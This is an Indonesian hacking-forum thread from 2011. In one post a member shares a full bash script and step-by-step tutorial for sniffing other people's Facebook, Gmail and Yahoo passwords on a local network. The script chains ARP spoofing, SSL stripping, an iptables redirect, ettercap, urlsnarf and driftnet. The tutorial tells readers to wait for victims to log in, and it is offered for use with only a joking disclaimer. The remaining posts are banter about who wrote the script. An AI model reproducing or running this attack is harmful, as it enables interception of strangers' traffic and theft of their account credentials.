Thread Closed
[Share] Sniffing password FB dkk dengen script
#11
masa sih bro mirip, bisa minta link postingan nya om zee??? kalo emang mirip yaa gpp bro yamg penting bisa berbagi disini.......

#12
http://zeestuff.wordpress.com/2011/04/03...ng-script/ <-- tuh om postingannya om zee
Yang putih, yang seharusnya ber-aksi dan berbakat!
Linuxtivist blog

#13
iya memang mirip .. bedanya cuma dari fitur saja.. waktu itu ane coba bikin tampilan console x-fontnya memang copas dari salah satu script.. tapi kok bisa sama yak ... bener juga kata om gtx.. yang penting bisa berbagi
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only

#14
(07-05-2011, 05:04 PM)zee eichel Wrote: iya memang mirip .. bedanya cuma dari fitur saja.. waktu itu ane coba bikin tampilan console x-fontnya memang copas dari salah satu script.. tapi kok bisa sama yak ... bener juga kata om gtx.. yang penting bisa berbagi

yang penting kegunaannya sama Big Grin hahahaha

#15
egharts.sh v2 nanti ada hamster kwkwwkwk biar beda aja dah ...
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only

#16
(07-05-2011, 05:15 PM)zee eichel Wrote: egharts.sh v2 nanti ada hamster kwkwwkwk biar beda aja dah ...

hahahah
hamster nya siapa tuh om Tongue
hahhay,,
./kaboor

#17
(07-05-2011, 05:00 PM)THJC Wrote: http://zeestuff.wordpress.com/2011/04/03...ng-script/ <-- tuh om postingannya om zee

ane udah ke TKP om, dan emang sama kegunaannya. wah ane sedot aahh script nya Om zee untuk nambahin koleksi.



(07-05-2011, 05:15 PM)zee eichel Wrote: egharts.sh v2 nanti ada hamster kwkwwkwk biar beda aja dah ...

Pantesan om zee ga bisa gunakan egharts.sh di BT5 sama kyk ane cause ettercap nya dodol di BT5, padahal nih script powerfull banget.

Ditunggu OM zee egharts.sh V2...CoolCool


#18
(07-06-2011, 03:12 PM)Liyan Oz Wrote: Bash codingnya bagus... C0dernya udah mengerti ne seluk beluk bash, kirm salam buat c0dernya ya om Big Grin kayaknya dia pintar Bash Big Grin ajak join Om

Confusedhoot:

yang bikin codernya anggota forum backtrack-linux.org ane cuma bisa copas doang........hehehheehhe

#19
(07-05-2011, 10:01 AM)gtx150 Wrote: Hallo rekan2 IBT, mumpung belum ada kerjaan alias masih nganggur dan daripada otak nganggur juga mendingan ane buat tutor sniffing menggunakan script tetapi tutor ini hanya berlaku di BT4 R2 cause sudah dicoba di BT5 ettercapnya bermasalah......

Oke langsung aja bro............

1.Pertama-tama kita copas script dibawah dan buat menjadi executable

Spoiler! :

#!/bin/bash

# Script for sniffing https connections.
# Script use Arpspoof, SSLStrip, Ettercap, Urlsnarf and Driftnet.
# Tested on BT4 R2
# BY gHero,cseven,spudgunman.
# Ver 0.2

# ASCII sniff.sh
echo '
.__ _____ _____ .__
______ ____ |__|/ ____\/ ____\ _____| |__
/ ___// \| \ __\\ __\ / ___/ | \
\___ \| | \ || | | | \___ \| Y \
/____ >___| /__||__| |__| /\/____ >___| /
\/ \/ \/ \/ \/
'

echo '1' > /proc/sys/net/ipv4/ip_forward

iptables --flush
sleep 1

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000


# Arpspoof
echo -n -e "Would you like to ARP a (T)arget or full (N)etwork? ";
read ARPOP

if [ "$ARPOP" == "T" ] ; then
echo
echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
echo '------------------------'
echo -n -e '\E[37;41m'"Client IP address: "; tput sgr0
read IP1
echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
read IP2

echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
read INT
xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' -t '$IP1' '$IP2'' &

else

echo
echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
echo '------------------------'
echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
read IP2

echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
read INT
xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' '$IP2'' &

fi

# SSLSTRIP
xterm -fg green4 -bg grey0 -e 'sslstrip -a -w ssl_log.txt' &

# ETTERCAP
xterm -fg green4 -bg grey0 -e 'ettercap -T -q -i '$INT'' &

# URLSNARF
xterm -fg green4 -bg grey0 -e 'urlsnarf -i '$INT' | grep http > urlsnarf_log.txt' &

# DRIFTNET
driftnet -p -i $INT &


script diatas bukan ane yang buat bro, ane dapat dr forum backtrack.org

2. kalo udah dicopas save as dengan nama bebas terserah agan, kalo ane sih kasih nama file nya "sniff" dan pastikan buat menjadi executeble

3. selanjutnya execute script tadi dengan command
# ./sniff.sh

4. kalo berhasil akan keluar pertanyaan seperti dibawah ini:
Spoiler! :
[Image: snapshot23.png]


5. Tunggu dengan sabar karena kita ga tahu kapan korban akan login ke account FB, Gmail, yahoo dkk. setelah menunggu dengan sabar akhirnya datang eh salah nongol juga tuh password di ettercap
Spoiler! :
[Image: snapshot621.png]


mudah kan cara sniffingnya, tapi inget bro jg diacak acak tuh account orang kan dosa.........

apabila masih ada kekurangan mohon dimaafkan segera karena tujuan ane hanya berbagi.......


CoolCoolCoolCoolCoolCool
wew.... thank bro... baru masuk dah dapt ilmu...hehheee....

#20
gak bisa kalau di jaringan switch


Thread Closed


Users browsing this thread: 1 Guest(s)